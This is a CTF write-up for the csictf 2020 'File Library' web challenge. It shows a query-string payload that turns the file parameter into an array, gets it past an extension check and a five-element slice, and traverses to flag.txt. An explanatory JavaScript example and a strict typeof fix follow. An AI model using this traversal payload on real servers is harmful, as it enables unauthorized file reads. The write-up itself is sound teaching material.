csictf 2020

CTF Writeup - https://ctftime.org/event/1081

22 July 2020

File Library

by shreyas-sriram

This is my file library. I don’t have a lot of files, but I hope you like the ones I have!

http://chall.csivit.com:30222

Files

Solution

File-type check

    if (format == 'js' || format == 'ts' || format == 'c' || format == 'cpp') {
        return true;
    }

    return false;

Filename slicing

    if (file.length > 5) {
        file = file.slice(0, 5);
    }

Payload

/getFile?file[]=f&file[]=4&file[]=k&file[]=e&file[]=/../flag.txt&file[]=.&file[]=js

Payload Explanation

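file[] = ["f","4","k","e","/../flag.txt",".","js"]

Repeating file[] in the query string makes the server receive file as an array instead of a string. The last two elements, "." and "js", are there to satisfy the file-type check. Because the array has more than five elements, slice(0, 5) then keeps the first five elements rather than the first five characters, which drops "." and "js" and leaves "/../flag.txt" as the final element of the filename.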
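Why the array gets past both checks, and how a type check stops it, as an added example (not the challenge's source code). The function names, the `/app` base directory, the `strict` switch and the way `format` is derived are assumptions; only the two checks come from the snippets above.

```javascript
// Added example, not the challenge's source. The two checks are the ones
// shown above; the function names, the '/app' base directory and the way
// `format` is derived (everything after the first '.') are assumptions.
function allowedFileType(file) {
    // slice() and indexOf() exist on strings and on arrays alike.
    const format = file.slice(file.indexOf('.') + 1);
    // Loose equality coerces the array ['js'] to the string 'js'.
    return format == 'js' || format == 'ts' || format == 'c' || format == 'cpp';
}

function truncate(file) {
    // On an array this keeps 5 elements, not 5 characters.
    return file.length > 5 ? file.slice(0, 5) : file;
}

// Stand-in for path resolution: collapse '.' and '..' segments.
function normalize(p) {
    const out = [];
    for (const seg of p.split('/')) {
        if (seg === '..') out.pop();
        else if (seg !== '' && seg !== '.') out.push(seg);
    }
    return '/' + out.join('/');
}

function servedPath(file, strict) {
    // Hardened variant: accept the parameter only if it is a plain string.
    if (strict && typeof file !== 'string') return null;
    if (!allowedFileType(file)) return null;
    // Concatenation joins array elements with commas: 'f,4,k,e,/../flag.txt'.
    return normalize('/app/' + truncate(file));
}

// Constructed input: the query string from the Payload section. URLSearchParams
// stands in for the server's query parser, which yields the same array.
const query = 'file[]=f&file[]=4&file[]=k&file[]=e&file[]=/../flag.txt&file[]=.&file[]=js';
const asArray = new URLSearchParams(query).getAll('file[]');

console.log(servedPath('ok.js', false)); // /app/ok.js
console.log(servedPath(asArray, false)); // /app/flag.txt
console.log(servedPath(asArray, true));  // null
```
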

Flag URL

http://chall.csivit.com:30222/getFile?file[]=f&file[]=l&file[]=a&file[]=g&file[]=/../flag.txt&file[]=.&file[]=js

Flag

csictf{5h0uld_5tr1ng1fy_th3_p4r4ms}
tags: Web